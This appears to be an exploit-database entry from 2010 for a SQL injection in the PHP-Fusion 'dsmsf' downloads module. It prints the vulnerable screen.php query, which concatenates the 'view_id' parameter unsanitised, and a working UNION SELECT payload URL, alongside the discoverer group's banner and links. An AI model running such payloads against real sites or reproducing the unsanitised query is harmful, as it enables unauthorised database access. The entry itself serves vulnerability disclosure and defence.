header-logo
Suggest Exploit
vendor:
dsmsf
by:
Inj3ct0r
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: dsmsf
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

PHP-fusion dsmsf (module downloads) SQL Inj3ct0r Exploit

The vulnerability exists in the file screen.php, where an attacker can inject a malicious SQL query via the 'view_id' parameter. An example exploit is 'screen.php?view_id=-1+union+select+version()--'

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

========================================================
PHP-fusion dsmsf (module downloads) SQL Inj3ct0r Exploit
========================================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                          
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By   : Inj3ct0r
#[+] Site            : Inj3ct0r.com
#[+] support e-mail  : submit[at]inj3ct0r.com
#[+] visit : inj3ct0r.com , inj3ct0r.org , inj3ct0r.net

Product: PHP-fusion dsmsf
Site: php-fusion.co.uk


Vulnerability in the file screen.php :

if (isset($_GET['view_id'])){ 
        $result = dbquery("SELECT * FROM ".DB_DOWNLOADS." WHERE download_id=".$_GET['view_id']."");


Exploit:

screen.php?view_id=-1+union+select+version()--


---------------------------------

ThE End =]  Visit my proj3ct  :

http://inj3ct0r.com
http://inj3ct0r.org
http://inj3ct0r.net


# Inj3ct0r.com [2010-04-04]